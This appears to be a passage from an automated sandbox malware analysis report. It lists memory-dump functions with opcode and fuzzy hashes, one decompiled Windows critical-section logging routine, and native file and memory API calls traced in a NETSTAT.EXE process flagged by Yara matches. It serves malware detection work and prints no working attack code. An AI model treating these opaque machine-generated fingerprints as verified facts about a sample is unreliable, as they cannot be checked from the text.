Uniqueness Score: -1.00%

Function 00B241E8, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddbdff4a83c27d2f7f84570bffa2c0217d9be8b125fa8c019f6938edf26c778e
Instruction ID: fb5732e37569f955bcb91a8c3029ab0aabe90a6abc52e471a5e36581a1d39c39
Opcode Fuzzy Hash: ddbdff4a83c27d2f7f84570bffa2c0217d9be8b125fa8c019f6938edf26c778e
Instruction Fuzzy Hash: E4F0157D860740DFCBA0EFAAAA0170436F4F744B10FA041AAA018876B5CF344C80CF02

Uniqueness

Uniqueness Score: -1.00%

Function 00B4D380, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 89cb498c29804db62dd60103514e3e801102e0a3db43af64d0c6565d606cff37
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: B6E0C231284244FBDF229E44CD01FA97BAADB507A0F204071FE085A6A2CA719D91E6C8

Uniqueness

Uniqueness Score: -1.00%

Function 00ACA185, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bb2f0b5586b64b34f272976f2820e9538af9fdd28d00a8faf53a088e708df86
Instruction ID: af38f521fe6f0b59e5f26f92563df121c634c537a85927d8d65b35ec73ff5ea9
Opcode Fuzzy Hash: 1bb2f0b5586b64b34f272976f2820e9538af9fdd28d00a8faf53a088e708df86
Instruction Fuzzy Hash: 4AD0C7621200041ACB2C33119E15F362396E7A4B18F2549ADF10A0A9B2DEB08CD0D24B

Uniqueness

Uniqueness Score: -1.00%

Function 00AC16E0, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c113bb31d96b689ea0fcee8a24fae779a612df14cb399163684c57d282dbce53
Instruction ID: f4de87a40fb2263c9eb52c0addb3ef8ba1c7ea1cefc3e2b3ac55d1450ab8022e
Opcode Fuzzy Hash: c113bb31d96b689ea0fcee8a24fae779a612df14cb399163684c57d282dbce53
Instruction Fuzzy Hash: CED0A932300200A2DA2D6B109919F142396EB82B85F3904ACF20B4A8D3CFB0CCA2E488

Uniqueness

Uniqueness Score: -1.00%

Function 00B153CA, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 2f5f5ebbbdb463315b09aa2c11900c346e6797864a4a5af83764c433c4c96ab7
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: 96E08C31A04A80DBCF22DB48CA50F8EB7F9FB84B40F140054B0095F662C664AC40CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00AC35A1, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: e36c40d27b6cb2e4bbe5111d14dd407d4e8512cc31bd05559b5706f20266cb3a
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 39D0C9335521889EDF51EB50C228F6877B2BB0131CF6AA06D944646992C33A4F5AD641

Uniqueness

Uniqueness Score: -1.00%

Function 00AAAAB0, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: a5f46f71bdd540bc05ae93d5e7fc6f34d5004c1255c491cb03ede1d52ff99a9b
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 88D09235252A80CFD6168B48C554B1533A4BB14B80FC50490E5008B661E728DD40CA00

Uniqueness

Uniqueness Score: -1.00%

Function 00B1A537, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 1645535e441692c2523cbb0a1937a619975a7a1be944ee77caa40c08a1703075
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 78C01232080248BBCB126E85CD02F467B2EEB94B60F008010BA080A5628A3AE970EA84

Uniqueness

Uniqueness Score: -1.00%

Function 00A9DB40, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 5de546d24565ad2b24af4a77570e01fe15a9c5df35cac7cd06f3458326e87b83
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: 7BC08C30390A00AAEB221F20CE02B4077A4BB01B01F4504A07300DA0F2DB78DC01E600

Uniqueness

Uniqueness Score: -1.00%

Function 00A9AD30, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 27ed7e513d5458a415947314b5c77c8dc80d3120ec9f2026d44693a7bc444749
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 4FC08C32080288BBC7126A45CE01F057B2DE790B60F000020B6040A6628972E8A0D588

Uniqueness

Uniqueness Score: -1.00%

Function 00AA76E2, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 4529d00f49946f26ad8e7243d422591b185bb085cb8fccf50f4e9baaa71717ce
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: 2BC08C70149AC05AEB2A5708CE21B2A3654AB09708F48059CBA010E4E2C3A8AC02C208

Uniqueness

Uniqueness Score: -1.00%

Function 00AC36CC, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: c8334ea2c2f523c6459fd1c68274ff577fc5af6ef32712aa7366acd47a09b97a
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 03C02B71150440BBDB152F30CE11F15B358FB00B21F6403587230454F2D5289C00D100

Uniqueness

Uniqueness Score: -1.00%

Function 00AB3A1C, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: dbc9e20ad085581151a437416cdd37e07c6eea9c6a3929488e2ea07819b658b2
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 92C08C32080248BBC7126E41DD01F01BB2DE794B60F000020B6040A5628532EC60D588

Uniqueness

Uniqueness Score: -1.00%

Function 00AB7D50, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: bb978f50046dcb009240484c31c9dacfb625ce3cd69b634470cfdedcc5830d24
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 76B092343019408FCF16DF18C080B5933E8BB84B80B8400D4E400CBA21D229E8008900

Uniqueness

Uniqueness Score: -1.00%

Function 00AC2ACB, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 838446ac76dc39a8a27fbc2225c02d7026d12e588107b6b48ecb1237aff4f63e
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 77B01232D11440CFCF02EF40C720B197331FB00750F058490A00127971C328AC01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00AD98A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ada4fdcd14c79767fcfd9a733f6f756f55c931af76bc1587a3db2f50779748e3
Instruction ID: d6d50c89c032680fbfb221bd172b3e3244214f5f5eeafd7d52df6edce2fae5d2
Opcode Fuzzy Hash: ada4fdcd14c79767fcfd9a733f6f756f55c931af76bc1587a3db2f50779748e3
Instruction Fuzzy Hash: 8090026130104402D202616A44146160009D7D13C5FA1C022E5414555D86658953F172

Uniqueness

Uniqueness Score: -1.00%

Function 00AD9820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 232d346d689029a694a6f0a298d7b11a46e2f9181cd16946f952543e2ed13a24
Instruction ID: 34693ed8810d6490bcfb1fead3a66d5af44150ff594c298c0ffdd75feba80106
Opcode Fuzzy Hash: 232d346d689029a694a6f0a298d7b11a46e2f9181cd16946f952543e2ed13a24
Instruction Fuzzy Hash: 3290027124104402D241716A44046160009A7D03C1FA1C022A4414554E86958A56FAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00ADB040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb2c23d8359cf1cf75c5e5de6567c77d77403405d1be33886b64cbaf33bd1db9
Instruction ID: d524976bd7765380893bce8afe964dbc577b92e3c2003b4d2afb21656177eba7
Opcode Fuzzy Hash: cb2c23d8359cf1cf75c5e5de6567c77d77403405d1be33886b64cbaf33bd1db9
Instruction Fuzzy Hash: 089002A1601180434640B16A48044165015A7E13813A1C131A4444560C86A88855E2A5

Uniqueness

Uniqueness Score: -1.00%

Function 00AD95F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad9e8922639a20ad6cd096ff5fded83595e194f0fb0729d90900c2ab41490f5a
Instruction ID: c299d128f43f09b053b6ac7ddc723511ac200d7d77e002000f380534f527c967
Opcode Fuzzy Hash: ad9e8922639a20ad6cd096ff5fded83595e194f0fb0729d90900c2ab41490f5a
Instruction Fuzzy Hash: 7690027120104802D204616A4804696000597D0381F61C021AA014655E96A58891B171

Uniqueness

Uniqueness Score: -1.00%

Function 00AD99D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3af3e4a287f2b266376d40d0cbae740ff619f69dc3df726d7e74740b50662aba
Instruction ID: ad64f4786ef2d06adfe071080ed5f826beaadd50e1804c877b97e32c5512829b
Opcode Fuzzy Hash: 3af3e4a287f2b266376d40d0cbae740ff619f69dc3df726d7e74740b50662aba
Instruction Fuzzy Hash: D99002A121104042D204616A4404716004597E1381F61C022A6144554CC5698C61A165

Uniqueness

Uniqueness Score: -1.00%

Function 00AD9520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76cfba17547610d5e22e49f81d8e8fa29baf5eba44ea606a984b7f7f96599b57
Instruction ID: 5337e8e616d2f5dcef66959ad8c4d2d8765c1d5864ef8ef42d86abc3e0e3c8f0
Opcode Fuzzy Hash: 76cfba17547610d5e22e49f81d8e8fa29baf5eba44ea606a984b7f7f96599b57
Instruction Fuzzy Hash: 029002E1201180924600A26A8404B1A450597E0381B61C026E5044560CC5658851E175

Uniqueness

Uniqueness Score: -1.00%

Function 00ADAD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eafeb9ea759ecda2591a45e8e3ff7bde9c0fd4d0577a52c84777b430c5015eef
Instruction ID: f249fdf7d91b60880cf3b1b48fd084fced33906c7fc97880a4dd828a96ae7cc5
Opcode Fuzzy Hash: eafeb9ea759ecda2591a45e8e3ff7bde9c0fd4d0577a52c84777b430c5015eef
Instruction Fuzzy Hash: AA900271A05040129240716A48146564006A7E07C1B65C021A4504554C89948A55A3E1

Uniqueness

Uniqueness Score: -1.00%

Function 00AD9560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f17064647b2fef557fbcd96949f7afd781995747569729e19ae2373f5c459369
Instruction ID: 1ac809f592b95e4968c0c45bf774cccc4e9094882f731ba236b0faf002cc0da5
Opcode Fuzzy Hash: f17064647b2fef557fbcd96949f7afd781995747569729e19ae2373f5c459369
Instruction Fuzzy Hash: 57900265221040020245A56A060451B0445A7D63D13A1C025F5406590CC6618865A361

Uniqueness

Uniqueness Score: -1.00%

Function 00AD9950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 591f48e327b3ce9363448655f59bb62a34b7b810b0ba17b77c420227e2dc4894
Instruction ID: 0cf3fda0c0433794ddabd0f408f2bf87232950befa3d3ff86db2158e2388efad
Opcode Fuzzy Hash: 591f48e327b3ce9363448655f59bb62a34b7b810b0ba17b77c420227e2dc4894
Instruction Fuzzy Hash: E69002A120144403D240656A4804617000597D0382F61C021A6054555E8A698C51B175

Uniqueness

Uniqueness Score: -1.00%

Function 00AD9A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50b37156e858290c261b4787a1513ff551a05c71837d4b48d9c93fadff983a74
Instruction ID: 92c9ff6f3bbaa4faec89b20956a4966d82a81772e1ee1b3899436c497531b2a8
Opcode Fuzzy Hash: 50b37156e858290c261b4787a1513ff551a05c71837d4b48d9c93fadff983a74
Instruction Fuzzy Hash: BE90026120148442D240626A4804B1F410597E1382FA1C029A8146554CC9558855A761

Uniqueness

Uniqueness Score: -1.00%

Function 00AD96D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b50e26c985858addfb7f060d0d990c3679a768d41df5bca4f0bfad91fb93688f
Instruction ID: ef7bcba649029ff3917baf6fb14973cf2b30e98c4340b909632f639fe293cb3a
Opcode Fuzzy Hash: b50e26c985858addfb7f060d0d990c3679a768d41df5bca4f0bfad91fb93688f
Instruction Fuzzy Hash: 2B90027120104842D200616A4404B56000597E0381F61C026A4114654D8655C851B561

Uniqueness

Uniqueness Score: -1.00%

Function 00AD9A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec3ab07a3d7091e18a5801b2a1b3d089e1d2e1497e7cf2da739a9eefeede2af8
Instruction ID: 4c3b93a5a1f7a6190990ac9a911731a9b4b65d61d633a01a0f316bb3855fb910
Opcode Fuzzy Hash: ec3ab07a3d7091e18a5801b2a1b3d089e1d2e1497e7cf2da739a9eefeede2af8
Instruction Fuzzy Hash: 0490027120144402D200616A4808757000597D0382F61C021A9154555E86A5C891B571

Uniqueness

Uniqueness Score: -1.00%

Function 00ADA3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a680040a041dd35d834b8a9afb2218c54ff291bf98f3a1748e2b37d9cd80a5e
Instruction ID: a17331ab0fd5947ac2be61bfb740c73d8e88a7e681a7d37e8be73405e7848159
Opcode Fuzzy Hash: 1a680040a041dd35d834b8a9afb2218c54ff291bf98f3a1748e2b37d9cd80a5e
Instruction Fuzzy Hash: 2290027120148002D240716A844461B5005A7E0381F61C421E4415554C86558856E261

Uniqueness

Uniqueness Score: -1.00%

Function 00AD9B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cf0855c1a0036f95893a324f7a8fd9d9725aed98f00c25b22fe0902b3adf72f
Instruction ID: a6d38f88f1ee1110aa5a59f26ecb81d118ef85c083e1f2343d2a8abc5840e4af
Opcode Fuzzy Hash: 0cf0855c1a0036f95893a324f7a8fd9d9725aed98f00c25b22fe0902b3adf72f
Instruction Fuzzy Hash: A690026124104802D240716A84147170006D7D0781F61C021A4014554D86568965B6F1

Uniqueness

Uniqueness Score: -1.00%

Function 00B2FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00B2FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = L00ADCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				L00B25720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return L00B25720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x00b2fdda
0x00b2fde2
0x00b2fde5
0x00b2fdec
0x00b2fdfa
0x00b2fdff
0x00b2fe0a
0x00b2fe0f
0x00b2fe17
0x00b2fe1e
0x00b2fe19
0x00b2fe19
0x00b2fe19
0x00b2fe20
0x00b2fe21
0x00b2fe22
0x00b2fe25
0x00b2fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B2FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B2FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B2FE2B

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 063585bc963aab82c02d5f91078269074a4dfaa03b61c8c5ffdcba543359a3a3
Instruction ID: dc1f84e0e8c789468ea75481fdef6c3f89251d581c9f2271e768c37f0fe86eac
Opcode Fuzzy Hash: 063585bc963aab82c02d5f91078269074a4dfaa03b61c8c5ffdcba543359a3a3
Instruction Fuzzy Hash: 65F0F672640611BFD6212A45EC06F33BBAAEB44730F250365F628561E1DA62FC2097F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: NETSTAT.EXE PID: 744 Parent PID: 3424 NETSTAT.EXECOMMON

Executed Functions

Function 007785F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00773BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00773BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0077863D

Strings

.z`, xrefs: 0077862D, 00778638

Memory Dump Source

Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: c8cbedac32794286a31e803b124659f0bd3b2e729add41b260dc2c67611e4e88
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: D2F0BDB2201208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241D630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 007786A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00773D82,5E972F65,FFFFFFFF,?,?,?,00773D82,?,A:w,FFFFFFFF,5E972F65,00773D82,?,00000000), ref: 007786E5

Strings

A:w, xrefs: 007786BC, 007786C8

Memory Dump Source

Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID: A:w
API String ID: 2738559852-1708196867
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 125e682deb8171809ab6ba3ffa0c320cc0ccdd10a4501cc657ec9c1da423f427
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 85F0A4B2200208ABCB14DF89DC85EEB77ADAF8C754F158248BE1D97241D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00778720, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(`=w,?,?,00773D60,00000000,FFFFFFFF), ref: 00778745

Strings

`=w, xrefs: 0077873C, 00778744

Memory Dump Source

Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: `=w
API String ID: 3535843008-320847379
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: bb9680a250660e2fc6cbef91aad75f809fe1c2cb686889673390acb686d3a510
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 54D01275201218ABD710EB98CC89E97776DEF44750F154455BA1C5B242D530F51086E0

Uniqueness

Uniqueness Score: -1.00%

Function 007787D0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00762D11,00002000,00003000,00000004), ref: 00778809

Memory Dump Source

Source File: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Offset: 00760000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 687238ea76a265fdf6caf041eab2abda0c3b1b1c49e8065d8b1018380887ed3d
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 24F015B2200208ABCB14DF89CC85EAB77ADAF88750F118148BE0897241C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03259A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03259A5A

Memory Dump Source

Source File: 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: true

Associated: 00000009.00000002.935684469.000000000330B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 775aa7d98b87ac312b69fd3e70f27c82a342597ca20d6ca30cb5fbdcf955faa8
Instruction ID: e248f9dc69daeb55cd7ab8b946125e57b720a5f41b467f6c0993294c0478a2f3
Opcode Fuzzy Hash: 775aa7d98b87ac312b69fd3e70f27c82a342597ca20d6ca30cb5fbdcf955faa8
Instruction Fuzzy Hash: 8A90026132184C42D200A57A4C14B0700059BD0343F51C115A0144554CCE5588E165A1

Uniqueness

Uniqueness Score: -1.00%

Function 03259910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0325991A

Memory Dump Source

Source File: 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: true

Associated: 00000009.00000002.935684469.000000000330B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8e95910e00d6bcd8fba7b43b663c36e5ec013e38a66839557ca60b1960665f5b
Instruction ID: 2b44aaf02e8e53d64648f02d5fc119650fff057498051947b363ea2e8736e449
Opcode Fuzzy Hash: 8e95910e00d6bcd8fba7b43b663c36e5ec013e38a66839557ca60b1960665f5b
Instruction Fuzzy Hash: D59002B131104C02D140B16A440474600059BD0341F51C011A5054554E8B998DD576E5

Uniqueness

Uniqueness Score: -1.00%

Function 032599A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 032599AA

Memory Dump Source

Source File: 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, Offset: 031F0000, based on PE: true

